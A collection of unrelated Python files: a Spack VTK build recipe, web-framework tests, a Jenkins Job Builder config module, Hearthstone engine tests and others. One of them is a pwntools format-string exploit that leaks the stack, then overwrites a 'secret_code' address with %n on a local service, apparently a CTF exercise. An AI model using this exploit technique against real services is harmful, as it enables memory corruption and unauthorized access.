depends_on('jsoncpp')
depends_on('libxml2')
depends_on('lz4')
depends_on('netcdf')
depends_on('netcdf-cxx')
depends_on('libpng')
depends_on('libtiff')
depends_on('zlib')
def url_for_version(self, version):
url = "http://www.vtk.org/files/release/{0}/VTK-{1}.tar.gz"
return url.format(version.up_to(2), version)
def setup_environment(self, spack_env, run_env):
# VTK has some trouble finding freetype unless it is set in
# the environment
spack_env.set('FREETYPE_DIR', self.spec['freetype'].prefix)
def cmake_args(self):
spec = self.spec
opengl_ver = 'OpenGL{0}'.format('2' if '+opengl2' in spec else '')
cmake_args = [
'-DBUILD_SHARED_LIBS=ON',
'-DVTK_RENDERING_BACKEND:STRING={0}'.format(opengl_ver),
# In general, we disable use of VTK "ThirdParty" libs, preferring
# spack-built versions whenever possible
'-DVTK_USE_SYSTEM_LIBRARIES:BOOL=ON',
# However, in a few cases we can't do without them yet
'-DVTK_USE_SYSTEM_GL2PS:BOOL=OFF',
'-DVTK_USE_SYSTEM_LIBHARU=OFF',
'-DVTK_USE_SYSTEM_LIBPROJ4:BOOL=OFF',
'-DVTK_USE_SYSTEM_OGGTHEORA:BOOL=OFF',
'-DNETCDF_DIR={0}'.format(spec['netcdf'].prefix),
'-DNETCDF_C_ROOT={0}'.format(spec['netcdf'].prefix),
'-DNETCDF_CXX_ROOT={0}'.format(spec['netcdf-cxx'].prefix),
# Disable wrappers for other languages.
'-DVTK_WRAP_JAVA=OFF',
'-DVTK_WRAP_TCL=OFF',
]
if '+mpi' in spec:
cmake_args.extend([
'-DVTK_Group_MPI:BOOL=ON',
'-DVTK_USE_SYSTEM_DIY2:BOOL=OFF',
])
if '+ffmpeg' in spec:
cmake_args.extend(['-DModule_vtkIOFFMPEG:BOOL=ON'])
# Enable/Disable wrappers for Python.
if '+python' in spec:
cmake_args.extend([
'-DVTK_WRAP_PYTHON=ON',
'-DPYTHON_EXECUTABLE={0}'.format(spec['python'].command.path),
'-DVTK_USE_SYSTEM_MPI4PY:BOOL=ON'
])
else:
cmake_args.append('-DVTK_WRAP_PYTHON=OFF')
if 'darwin' in spec.architecture:
cmake_args.extend([
'-DCMAKE_MACOSX_RPATH=ON'
])
if '+qt' in spec:
qt_ver = spec['qt'].version.up_to(1)
qt_bin = spec['qt'].prefix.bin
qmake_exe = os.path.join(qt_bin, 'qmake')
cmake_args.extend([
# Enable Qt support here.
'-DVTK_QT_VERSION:STRING={0}'.format(qt_ver),
'-DQT_QMAKE_EXECUTABLE:PATH={0}'.format(qmake_exe),
'-DVTK_Group_Qt:BOOL=ON',
])
# NOTE: The following definitions are required in order to allow
# VTK to build with qt~webkit versions (see the documentation for
# more info: http://www.vtk.org/Wiki/VTK/Tutorials/QtSetup).
if '~webkit' in spec['qt']:
cmake_args.extend([
'-DVTK_Group_Qt:BOOL=OFF',
'-DModule_vtkGUISupportQt:BOOL=ON',
'-DModule_vtkGUISupportQtOpenGL:BOOL=ON',
])
if '+xdmf' in spec:
if spec.satisfies('^cmake@3.12:'):
# This policy exists only for CMake >= 3.12
cmake_args.extend(["-DCMAKE_POLICY_DEFAULT_CMP0074=NEW"])
cmake_args.extend([
# Enable XDMF Support here
"-DModule_vtkIOXdmf2:BOOL=ON",
"-DModule_vtkIOXdmf3:BOOL=ON",
"-DBOOST_ROOT={0}".format(spec['boost'].prefix),
"-DBOOST_LIBRARY_DIR={0}".format(spec['boost'].prefix.lib),
"-DBOOST_INCLUDE_DIR={0}".format(spec['boost'].prefix.include),
"-DBOOST_NO_SYSTEM_PATHS:BOOL=ON",
# This is needed because VTK has multiple FindBoost
# and they stick to system boost if there's a system boost
# installed with CMake
"-DBoost_NO_BOOST_CMAKE:BOOL=ON",
"-DHDF5_ROOT={0}".format(spec['hdf5'].prefix),
# The xdmf project does not export any CMake file...
"-DVTK_USE_SYSTEM_XDMF3:BOOL=OFF",
"-DVTK_USE_SYSTEM_XDMF2:BOOL=OFF"
])
if '+mpi' in spec:
cmake_args.extend(["-DModule_vtkIOParallelXdmf3:BOOL=ON"])
cmake_args.extend([
'-DVTK_USE_SYSTEM_GLEW:BOOL=ON',
'-DVTK_RENDERING_BACKEND:STRING=OpenGL{0}'.format(
'2' if '+opengl2' in spec else ''),
])
if '+osmesa' in spec:
cmake_args.extend([
'-DVTK_USE_X:BOOL=OFF',
'-DVTK_USE_COCOA:BOOL=OFF',
'-DVTK_OPENGL_HAS_OSMESA:BOOL=ON'])
else:
cmake_args.extend([
'-DVTK_OPENGL_HAS_OSMESA:BOOL=OFF',
'-DOpenGL_GL_PREFERENCE:STRING=LEGACY'])
if 'darwin' in spec.architecture:
cmake_args.extend([
'-DVTK_USE_X:BOOL=OFF',
'-DVTK_USE_COCOA:BOOL=ON'])
elif 'linux' in spec.architecture:
cmake_args.extend([
'-DVTK_USE_X:BOOL=ON',
'-DVTK_USE_COCOA:BOOL=OFF'])
if spec.satisfies('@:6.1.0'):
cmake_args.extend([
'-DCMAKE_C_FLAGS=-DGLX_GLXEXT_LEGACY',
'-DCMAKE_CXX_FLAGS=-DGLX_GLXEXT_LEGACY'
])
# VTK 6.1.0 (and possibly earlier) does not use
# NETCDF_CXX_ROOT to detect NetCDF C++ bindings, so
# NETCDF_CXX_INCLUDE_DIR and NETCDF_CXX_LIBRARY must be
# used instead to detect these bindings
netcdf_cxx_lib = spec['netcdf-cxx'].libs.joined()
cmake_args.extend([
'-DNETCDF_CXX_INCLUDE_DIR={0}'.format(
spec['netcdf-cxx'].prefix.include),
'-DNETCDF_CXX_LIBRARY={0}'.format(netcdf_cxx_lib),
])
# Garbage collection is unsupported in Xcode starting with
# version 5.1; if the Apple clang version of the compiler
# is 5.1.0 or later, unset the required Objective-C flags
# to remove the garbage collection flags. Versions of VTK
# after 6.1.0 set VTK_REQUIRED_OBJCXX_FLAGS to the empty
# string. This fix was recommended on the VTK mailing list
# in March 2014 (see
# https://public.kitware.com/pipermail/vtkusers/2014-March/083368.html)
if (self.spec.satisfies('%clang') and
self.compiler.is_apple and
self.compiler.version >= Version('5.1.0')):
cmake_args.extend(['-DVTK_REQUIRED_OBJCXX_FLAGS=""'])
return cmake_args
|
import matrix
import digits
import urandom
import time
#assign randint function to r
r = urandom.randint
#create matrix class object
s = matrix.matrix
#create digits class object
d = digits
#initialize led matrix
s.init()
#clear led matrix
s.clear_all()
#show changes
s.show()
color = 0
while 1:
#set random active color
s.pixel_color( color )
#write pixmap of random digit to pic variable
pic = d.get_digit( r(0,9), d.digits_center )
#pic = d.get_digit( r(0,9), d.digits_left )
#pic = d.get_digit( r(0,9), d.digits_right )
#write pixmap to led matrix
s.clear_all()
s.pixel_mask( pic )
#show changes
s.show()
#wait some time
time.sleep_ms(1000)
color = color + 5
|
import pytest
from fastapi.applications import FastAPI
from httpx import AsyncClient
from starlette.status import HTTP_200_OK, HTTP_400_BAD_REQUEST
from app.models.domain.users import UserInDB
pytestmark = pytest.mark.asyncio
async def test_user_successful_login(
app: FastAPI, client: AsyncClient, test_user: UserInDB
) -> None:
login_json = {"user": {"email": "test@test.com", "password": "password"}}
response = await client.post(app.url_path_for("auth:login"), json=login_json)
assert response.status_code == HTTP_200_OK
@pytest.mark.parametrize(
"credentials_part, credentials_value",
(("email", "wrong@test.com"), ("password", "wrong")),
)
async def test_user_login_when_credential_part_does_not_match(
app: FastAPI,
client: AsyncClient,
test_user: UserInDB,
credentials_part: str,
credentials_value: str,
) -> None:
login_json = {"user": {"email": "test@test.com", "password": "password"}}
login_json["user"][credentials_part] = credentials_value
response = await client.post(app.url_path_for("auth:login"), json=login_json)
assert response.status_code == HTTP_400_BAD_REQUEST
|
from django.conf.urls import url, include
from .views import test
urlpatterns = [
url(r'^test/$', test, name='front-test'),
url(r'^i18n/', include('django.conf.urls.i18n')),
]
|
from pwn import *
# Bruteforce the index of the buffer
conn = remote("localhost", 50000)
print(conn.recv())
conn.send("I am not a robotBBAAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x\r\n")
print(conn.recv())
# Check the index of the buffer
conn = remote("localhost", 50000)
print(conn.recv())
conn.send(b"I am not a robotBBAAAA%11$p\r\n")
print(conn.recv())
# Overwrite the secret_code address
conn = remote("localhost", 50000)
print(conn.recv())
conn.send(b"I am not a robotBB\xbc\xff\x0d\x08%168x%11$n\r\n") # 080dffbc
print(conn.recv())
conn.interactive()
|
def string_to_bool(string):
if string in ('True', 'true', 'yes', 'y'):
return True
elif string in ('False', 'false', 'no', 'n'):
return False
else:
raise ValueError('Invalid string passed to string_to_bool.')
|
class Solution(object):
def uniquePaths(self, m, n):
if m < n:
return self.uniquePaths(n, m)
ways = [1] * n
for i in xrange(1, m):
for j in xrange(1, n):
print("#####")
print(ways)
ways[j] += ways[j - 1]
print(ways)
return ways[n - 1]
m = 4
n = 3
res = Solution().uniquePaths(m, n)
print(res)
|
from ....models import Instrument
from baselayer.app.access import auth_or_token
from ...base import BaseHandler
class RoboticInstrumentsHandler(BaseHandler):
@auth_or_token
def get(self):
instruments = (
Instrument.query_records_accessible_by(self.current_user)
.filter(Instrument.api_classname.isnot(None))
.all()
)
retval = {i.id: i.api_class.frontend_render_info(i) for i in instruments}
self.verify_and_commit()
return self.success(data=retval)
|
from typing import Dict, Optional, Sequence, Union
from rastervision2.pipeline.config import Config, register_config, Field
ClassFilter = Sequence[Union[str, 'ClassFilter']]
@register_config('vector_source')
class VectorSourceConfig(Config):
default_class_id: Optional[int] = Field(
...,
description=
('The default class_id to use if class cannot be inferred using other '
'mechanisms. If a feature defaults to a class_id of None, then that feature '
'will be deleted.'))
class_id_to_filter: Optional[Dict[int, Optional[ClassFilter]]] = Field(
None,
description=(
'Map from class_id to JSON filter used to infer missing class_ids. The '
'filter schema is according to '
'https://github.com/mapbox/mapbox-gl-js/blob/c9900db279db776f493ce8b6749966cedc2d6b8a/src/style-spec/feature_filter/index.js.' # noqa
))
line_bufs: Optional[Dict[int, Union[int, float, None]]] = Field(
None,
description=
('This is useful, for example, for buffering lines representing roads so that '
'their width roughly matches the width of roads in the imagery. If None, uses '
'default buffer value of 1. Otherwise, a map from class_id to '
'number of pixels to buffer by. If the buffer value is None, then no buffering '
'will be performed and the LineString or Point won\'t get converted to a '
'Polygon. Not converting to Polygon is incompatible with the currently '
'available LabelSources, but may be useful in the future.'))
point_bufs: Optional[Dict[int, Union[int, float, None]]] = Field(
None,
description=
'Same as above, but used for buffering Points into Polygons.')
def has_null_class_bufs(self):
if self.point_bufs is not None:
for c, v in self.point_bufs.items():
if v is None:
return True
if self.line_bufs is not None:
for c, v in self.line_bufs.items():
if v is None:
return True
return False
def build(self, class_config, crs_transformer):
raise NotImplementedError()
def update(self, pipeline=None, scene=None):
pass
|
import unittest.mock as mock
from unittest import TestCase
from esrally import racecontrol, config, exceptions
class RaceControlTests(TestCase):
def test_finds_available_pipelines(self):
expected = [
["from-sources-complete", "Builds and provisions Elasticsearch, runs a benchmark and reports results."],
["from-sources-skip-build", "Provisions Elasticsearch (skips the build), runs a benchmark and reports results."],
["from-distribution", "Downloads an Elasticsearch distribution, provisions it, runs a benchmark and reports results."],
["benchmark-only", "Assumes an already running Elasticsearch instance, runs a benchmark and reports results"]
]
self.assertEqual(expected, racecontrol.available_pipelines())
def test_prevents_running_an_unknown_pipeline(self):
cfg = config.Config()
cfg.add(config.Scope.benchmark, "race", "pipeline", "invalid")
cfg.add(config.Scope.benchmark, "mechanic", "distribution.version", "5.0.0")
with self.assertRaises(exceptions.SystemSetupError) as ctx:
racecontrol.run(cfg)
self.assertRegex(ctx.exception.args[0], r"Unknown pipeline \[invalid\]. List the available pipelines with [\S]+? list pipelines.")
def test_runs_a_known_pipeline(self):
mock_pipeline = mock.Mock()
p = racecontrol.Pipeline("unit-test-pipeline", "Pipeline intended for unit-testing", mock_pipeline)
cfg = config.Config()
cfg.add(config.Scope.benchmark, "race", "pipeline", "unit-test-pipeline")
cfg.add(config.Scope.benchmark, "mechanic", "distribution.version", "")
racecontrol.run(cfg)
mock_pipeline.assert_called_once_with(cfg)
# ensure we remove it again from the list of registered pipelines to avoid unwanted side effects
del p
|
import unittest
import odatacameradeputados
class GetInfoCDProposicoes(unittest.TestCase):
def test_get_proposicoes_200OK(self):
proposicoes = odatacameradeputados.get_proposicoes()
self.assertTrue(proposicoes["status_code"] == 200)
def test_get_proposicoes_not_none(self):
proposicoes = odatacameradeputados.get_proposicoes()
self.assertNotEqual(proposicoes, None)
def test_get_proposicoes_not_empty(self):
proposicoes = odatacameradeputados.get_proposicoes()
self.assertTrue(len(proposicoes["proposicoes"]) > 0)
def test_get_proposicoes_any_id(self):
proposicoes = odatacameradeputados.get_proposicoes()
self.assertTrue("id" in proposicoes["proposicoes"]["dados"][0]
and proposicoes["proposicoes"]["dados"][0]["id"] > 0)
def test_get_proposicoes_first_id(self):
# Preparing test
proposicoes = odatacameradeputados.get_proposicoes()
# retrieve the first id only
id_proposicoes = proposicoes["proposicoes"]["dados"][1]["id"]
proposicoes = odatacameradeputados.get_proposicoes(ids=id_proposicoes)
self.assertTrue("id" in proposicoes["proposicoes"]["dados"][0]
and proposicoes["proposicoes"]["dados"][0]["id"] == id_proposicoes)
def test_get_proposicoes_200OK_pg2(self):
proposicoes = odatacameradeputados.get_proposicoes(pagina=2)
self.assertTrue(proposicoes["status_code"] == 200)
self.assertTrue(proposicoes["total_retornado"] > 0)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.FengdieActivityCreateData import FengdieActivityCreateData
class AlipayMarketingToolFengdieActivityCreateModel(object):
def __init__(self):
self._activity = None
self._template_id = None
@property
def activity(self):
return self._activity
@activity.setter
def activity(self, value):
if isinstance(value, FengdieActivityCreateData):
self._activity = value
else:
self._activity = FengdieActivityCreateData.from_alipay_dict(value)
@property
def template_id(self):
return self._template_id
@template_id.setter
def template_id(self, value):
self._template_id = value
def to_alipay_dict(self):
params = dict()
if self.activity:
if hasattr(self.activity, 'to_alipay_dict'):
params['activity'] = self.activity.to_alipay_dict()
else:
params['activity'] = self.activity
if self.template_id:
if hasattr(self.template_id, 'to_alipay_dict'):
params['template_id'] = self.template_id.to_alipay_dict()
else:
params['template_id'] = self.template_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayMarketingToolFengdieActivityCreateModel()
if 'activity' in d:
o.activity = d['activity']
if 'template_id' in d:
o.template_id = d['template_id']
return o
|
# *****************************************************************
# Copyright 2015 MIT Lincoln Laboratory
# Project: SPAR
# Authors: OMD
# Description: Python script to configure an NTP client and run it
#
# Modifications:
# Date Name Modification
# ---- ---- ------------
# 30 Apr 2012 omd Original Version
# *****************************************************************
import subprocess
import os
import os.path
NTP_DIR = '/tmp/ntp'
replace_dict = {
'~~MASTER-IP~~': '192.168.100.10',
'~~NTP-DIR~~': NTP_DIR,
}
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
config_template = file(os.path.join(THIS_DIR, 'ntp.client.conf'), 'r')
try:
os.makedirs(NTP_DIR)
except OSError, e:
# Error 17 indicates the directory already exists which is fine.
if e.errno != 17:
raise e
config_file = file(os.path.join(NTP_DIR, 'ntp.client.conf'), 'w+')
for line in config_template:
for search, replace in replace_dict.iteritems():
line = line.replace(search, replace)
config_file.write(line)
config_file.close()
config_template.close()
# We may eventually need to specify the -I option here to bind ntp the
# backchannel network's interface
#
# The -N option causes ntpd to run at the highest possible priority so that we
# the time is as accurate as possible.
subprocess.Popen(['/usr/sbin/ntpd', '-c',
os.path.join(NTP_DIR, 'ntp.client.conf'),
'-l', os.path.join(NTP_DIR, 'ntp.log'), '-N'])
|
class JobService:
def update_status(self):
pass
|
'''
Implements base class for proxy managers. Inherit this to quickly create classes using different proxy APIs
'''
from pytimeparse.timeparse import timeparse
import datetime
from collections import deque
class ProxyManager():
def __init__(
self,
blacklist_cooldown='8hr',
reuse_cooldown='10m'
):
self._proxy_list = deque([])
self._proxy_hist_dict = {}
self.blacklist_cooldown = timeparse(blacklist_cooldown)
self.reuse_cooldown = timeparse(reuse_cooldown)
self.grab_proxies_from_api()
def grab_proxies_from_api(self):
pass
def check_proxy(self, proxy):
pass
def grab_proxy(self):
pass
def blacklist_proxy(self, proxy):
self._proxy_hist_dict[proxy]['blacklist_time'] = datetime.datetime.now()
def log_proxy_request(self, proxy):
self._proxy_hist_dict[proxy]['last_request_time'] = datetime.datetime.now()
self._proxy_hist_dict[proxy]['request_count'] += 1
|
#!/usr/bin/env python
# Copyright (C) 2015 Wayne Warren
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Manage JJB Configuration sources, defaults, and access.
from collections import defaultdict
import io
import logging
import os
from six.moves import configparser, StringIO
from six import PY2
from jenkins_jobs import builder
from jenkins_jobs.errors import JJBConfigException
from jenkins_jobs.errors import JenkinsJobsException
__all__ = [
"JJBConfig"
]
logger = logging.getLogger(__name__)
DEFAULT_CONF = """
[job_builder]
keep_descriptions=False
ignore_cache=False
recursive=False
exclude=.*
allow_duplicates=False
allow_empty_variables=False
retain_anchors=False
# other named sections could be used in addition to the implicit [jenkins]
# if you have multiple jenkins servers.
[jenkins]
url=http://localhost:8080/
query_plugins_info=False
"""
CONFIG_REQUIRED_MESSAGE = ("A valid configuration file is required. "
"No configuration file passed.")
DEPRECATED_PLUGIN_CONFIG_SECTION_MESSAGE = (
"Defining plugin configuration using a [{plugin}] section in your config"
" file is deprecated. The recommended way to define plugins now is by"
" using a [plugin \"{plugin}\"] section"
)
_NOTSET = object()
class JJBConfig(object):
def __init__(self, config_filename=None,
config_file_required=False,
config_section='jenkins'):
"""
The JJBConfig class is intended to encapsulate and resolve priority
between all sources of configuration for the JJB library. This allows
the various sources of configuration to provide a consistent accessor
interface regardless of where they are used.
It also allows users of JJB-as-an-API to create minimally valid
configuration and easily make minor modifications to default values
without strictly adhering to the confusing setup (see the _setup
method, the behavior of which largely lived in the cmd.execute method
previously) necessary for the jenkins-jobs command line tool.
:arg str config_filename: Name of configuration file on which to base
this config object.
:arg bool config_file_required: Allows users of the JJBConfig class to
decide whether or not it's really necessary for a config file to be
passed in when creating an instance. This has two effects on the
behavior of JJBConfig initialization:
* It determines whether or not we try "local" and "global" config
files.
* It determines whether or not failure to read some config file
will raise an exception or simply print a warning message
indicating that no config file was found.
"""
config_parser = self._init_defaults()
global_conf = '/etc/jenkins_jobs/jenkins_jobs.ini'
user_conf = os.path.join(os.path.expanduser('~'), '.config',
'jenkins_jobs', 'jenkins_jobs.ini')
local_conf = os.path.join(os.path.dirname(__file__),
'jenkins_jobs.ini')
conf = None
if config_filename is not None:
conf = config_filename
else:
if os.path.isfile(local_conf):
conf = local_conf
elif os.path.isfile(user_conf):
conf = user_conf
else:
conf = global_conf
if config_file_required and conf is None:
raise JJBConfigException(CONFIG_REQUIRED_MESSAGE)
config_fp = None
if conf is not None:
try:
config_fp = self._read_config_file(conf)
except JJBConfigException:
if config_file_required:
raise JJBConfigException(CONFIG_REQUIRED_MESSAGE)
else:
logger.warning("Config file, {0}, not found. Using "
"default config values.".format(conf))
if config_fp is not None:
if PY2:
config_parser.readfp(config_fp)
else:
config_parser.read_file(config_fp)
self.config_parser = config_parser
self._section = config_section
self.print_job_urls = False
self.jenkins = defaultdict(None)
self.builder = defaultdict(None)
self.yamlparser = defaultdict(None)
self._setup()
self._handle_deprecated_hipchat_config()
def _init_defaults(self):
""" Initialize default configuration values using DEFAULT_CONF
"""
config = configparser.ConfigParser()
# Load default config always
if PY2:
config.readfp(StringIO(DEFAULT_CONF))
else:
config.read_file(StringIO(DEFAULT_CONF))
return config
def _read_config_file(self, config_filename):
""" Given path to configuration file, read it in as a ConfigParser
object and return that object.
"""
if os.path.isfile(config_filename):
self.__config_file = config_filename # remember file we read from
logger.debug("Reading config from {0}".format(config_filename))
config_fp = io.open(config_filename, 'r', encoding='utf-8')
else:
raise JJBConfigException(
"A valid configuration file is required. "
"\n{0} is not valid.".format(config_filename))
return config_fp
def _handle_deprecated_hipchat_config(self):
config = self.config_parser
if config.has_section('hipchat'):
if config.has_section('plugin "hipchat"'):
logger.warning(
"Both [hipchat] and [plugin \"hipchat\"] sections "
"defined, legacy [hipchat] section will be ignored."
)
else:
logger.warning(
"[hipchat] section is deprecated and should be moved to a "
"[plugins \"hipchat\"] section instead as the [hipchat] "
"section will be ignored in the future."
)
config.add_section('plugin "hipchat"')
for option in config.options("hipchat"):
config.set('plugin "hipchat"', option,
config.get("hipchat", option))
config.remove_section("hipchat")
# remove need to reference jenkins section when using hipchat plugin
# moving to backports configparser would allow use of extended
# interpolation to remove the need for plugins to need information
# directly from the jenkins section within code and allow variables
# in the config file to refer instead.
if (config.has_section('plugin "hipchat"') and
not config.has_option('plugin "hipchat"', 'url')):
config.set('plugin "hipchat"', "url", config.get('jenkins', 'url'))
def _setup(self):
config = self.config_parser
logger.debug("Config: {0}".format(config))
# check the ignore_cache setting
ignore_cache = False
if config.has_option(self._section, 'ignore_cache'):
logger.warning("ignore_cache option should be moved to the "
"[job_builder] section in the config file, the "
"one specified in the [jenkins] section will be "
"ignored in the future")
ignore_cache = config.getboolean(self._section, 'ignore_cache')
elif config.has_option('job_builder', 'ignore_cache'):
ignore_cache = config.getboolean('job_builder', 'ignore_cache')
self.builder['ignore_cache'] = ignore_cache
# check the flush_cache setting
flush_cache = False
if config.has_option('job_builder', 'flush_cache'):
flush_cache = config.getboolean('job_builder', 'flush_cache')
self.builder['flush_cache'] = flush_cache
# check the print_job_urls setting
if config.has_option('job_builder', 'print_job_urls'):
self.print_job_urls = config.getboolean('job_builder',
'print_job_urls')
# Jenkins supports access as an anonymous user, which can be used to
# ensure read-only behaviour when querying the version of plugins
# installed for test mode to generate XML output matching what will be
# uploaded. To enable must pass 'None' as the value for user and
# password to python-jenkins
#
# catching 'TypeError' is a workaround for python 2.6 interpolation
# error
# https://bugs.launchpad.net/openstack-ci/+bug/1259631
try:
user = config.get(self._section, 'user')
except (TypeError, configparser.NoOptionError):
user = None
self.jenkins['user'] = user
try:
password = config.get(self._section, 'password')
except (TypeError, configparser.NoOptionError):
password = None
self.jenkins['password'] = password
# None -- no timeout, blocking mode; same as setblocking(True)
# 0.0 -- non-blocking mode; same as setblocking(False) <--- default
# > 0 -- timeout mode; operations time out after timeout seconds
# < 0 -- illegal; raises an exception
# to retain the default must use
# "timeout=jenkins_jobs.builder._DEFAULT_TIMEOUT" or not set timeout at
# all.
try:
timeout = config.getfloat(self._section, 'timeout')
except (ValueError):
raise JenkinsJobsException("Jenkins timeout config is invalid")
except (TypeError, configparser.NoOptionError):
timeout = builder._DEFAULT_TIMEOUT
self.jenkins['timeout'] = timeout
plugins_info = None
if (config.has_option(self._section, 'query_plugins_info') and
not config.getboolean(self._section, "query_plugins_info")):
logger.debug("Skipping plugin info retrieval")
plugins_info = []
self.builder['plugins_info'] = plugins_info
self.recursive = config.getboolean('job_builder', 'recursive')
self.excludes = config.get('job_builder', 'exclude').split(os.pathsep)
# The way we want to do things moving forward:
self.jenkins['url'] = config.get(self._section, 'url')
self.builder['print_job_urls'] = self.print_job_urls
# keep descriptions ? (used by yamlparser)
keep_desc = False
if (config and config.has_section('job_builder') and
config.has_option('job_builder', 'keep_descriptions')):
keep_desc = config.getboolean('job_builder',
'keep_descriptions')
self.yamlparser['keep_descriptions'] = keep_desc
# figure out the include path (used by yamlparser)
path = ["."]
if (config and config.has_section('job_builder') and
config.has_option('job_builder', 'include_path')):
path = config.get('job_builder',
'include_path').split(':')
self.yamlparser['include_path'] = path
# allow duplicates?
allow_duplicates = False
if config and config.has_option('job_builder', 'allow_duplicates'):
allow_duplicates = config.getboolean('job_builder',
'allow_duplicates')
self.yamlparser['allow_duplicates'] = allow_duplicates
# allow empty variables?
self.yamlparser['allow_empty_variables'] = (
config and config.has_section('job_builder') and
config.has_option('job_builder', 'allow_empty_variables') and
config.getboolean('job_builder', 'allow_empty_variables'))
# retain anchors across files?
retain_anchors = False
if config and config.has_option('job_builder', 'retain_anchors'):
retain_anchors = config.getboolean('job_builder',
'retain_anchors')
self.yamlparser['retain_anchors'] = retain_anchors
update = None
if (config and config.has_section('job_builder') and
config.has_option('job_builder', 'update')):
update = config.get('job_builder', 'update')
self.builder['update'] = update
def validate(self):
# Inform the user as to what is likely to happen, as they may specify
# a real jenkins instance in test mode to get the plugin info to check
# the XML generated.
if self.jenkins['user'] is None and self.jenkins['password'] is None:
logger.info("Will use anonymous access to Jenkins if needed.")
elif ((self.jenkins['user'] is not None and
self.jenkins['password'] is None) or
(self.jenkins['user'] is None and
self.jenkins['password'] is not None)):
raise JenkinsJobsException(
"Cannot authenticate to Jenkins with only one of User and "
"Password provided, please check your configuration."
)
if (self.builder['plugins_info'] is not None and
not isinstance(self.builder['plugins_info'], list)):
raise JenkinsJobsException("plugins_info must contain a list!")
def get_module_config(self, section, key, default=None):
""" Given a section name and a key value, return the value assigned to
the key in the JJB .ini file if it exists, otherwise emit a warning
indicating that the value is not set. Default value returned if no
value is set in the file will be a blank string.
"""
result = default
try:
result = self.config_parser.get(
section, key
)
except (configparser.NoSectionError, configparser.NoOptionError,
JenkinsJobsException) as e:
# use of default ignores missing sections/options
if result is None:
logger.warning(
"You didn't set a %s neither in the yaml job definition "
"nor in the %s section, blank default value will be "
"applied:\n%s", key, section, e)
return result
def get_plugin_config(self, plugin, key, default=None):
value = self.get_module_config('plugin "{}"'.format(plugin), key,
default)
# Backwards compatibility for users who have not switched to the new
# plugin configuration format in their config. This code should be
# removed in future versions of JJB after 2.0.
if value is default:
old_value = self.get_module_config(plugin, key, _NOTSET)
# only log warning if detected a plugin config setting.
if old_value is not _NOTSET:
value = old_value
logger.warning(
DEPRECATED_PLUGIN_CONFIG_SECTION_MESSAGE.format(
plugin=plugin))
return value
|
import time
from django.core.management.base import BaseCommand
from django.db import connections
from django.db.utils import OperationalError
class Command(BaseCommand):
def handle(self, *args, **options):
self.stdout.write('Waiting for the database...')
db_catch = False
while not db_catch:
try:
db_catch = connections['default']
except OperationalError:
self.stderr.write(
'The database is unavailable, trying one more time...'
)
time.sleep(1)
self.stdout.write(self.style.SUCCESS('Database is ready'))
|
import random
import unittest
from hearthbreaker.agents.basic_agents import PredictableAgent, DoNothingAgent
from hearthbreaker.constants import CHARACTER_CLASS, MINION_TYPE
from hearthbreaker.engine import Game
from hearthbreaker.replay import playback, Replay
from tests.agents.testing_agents import CardTestingAgent, OneCardPlayingAgent, EnemySpellTestingAgent, \
MinionAttackingAgent, PlayAndAttackAgent
from tests.testing_utils import generate_game_for, StackedDeck
from hearthbreaker.cards import *
class TestMage(unittest.TestCase):
def setUp(self):
random.seed(1857)
def test_ArcaneMissiles(self):
game = generate_game_for(MogushanWarden, ArcaneMissiles, OneCardPlayingAgent, CardTestingAgent)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(27, game.other_player.hero.health)
game.play_single_turn()
game.play_single_turn()
game.play_single_turn()
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Mogu'shan Warden", game.current_player.minions[0].card.name)
game.play_single_turn()
# The random numbers work so that the arcane missiles hit thrice on each target
self.assertEqual(9, game.other_player.hero.health)
self.assertEqual(4, game.other_player.minions[0].health)
def test_ArcaneMissilesWithSpellPower(self):
game = playback(Replay("tests/replays/card_tests/ArcaneMissilesWithSpellDamage.hsreplay"))
game.start()
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(1, game.other_player.minions[0].health)
self.assertEqual(2, game.other_player.minions[0].calculate_max_health())
self.assertEqual(27, game.other_player.hero.health)
return game
def test_WaterElemental(self):
game = generate_game_for(WaterElemental, StonetuskBoar, PredictableAgent, DoNothingAgent)
for turn in range(0, 11):
game.play_single_turn()
self.assertEqual(25, game.other_player.hero.health)
self.assertFalse(game.other_player.hero.frozen)
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(3, game.current_player.minions[0].calculate_attack())
self.assertEqual(6, game.current_player.minions[0].health)
self.assertEqual("Water Elemental", game.current_player.minions[0].card.name)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(22, game.other_player.hero.health)
# Always false after the end of a turn
self.assertTrue(game.other_player.hero.frozen)
# Now make sure that attacking the Water Elemental directly will freeze a character
random.seed(1857)
game = generate_game_for(WaterElemental, IronbarkProtector, OneCardPlayingAgent, PredictableAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual(5, game.other_player.minions[0].health)
# The player won't have taken damage because of armor, but should still be frozen
self.assertEqual(30, game.current_player.hero.health)
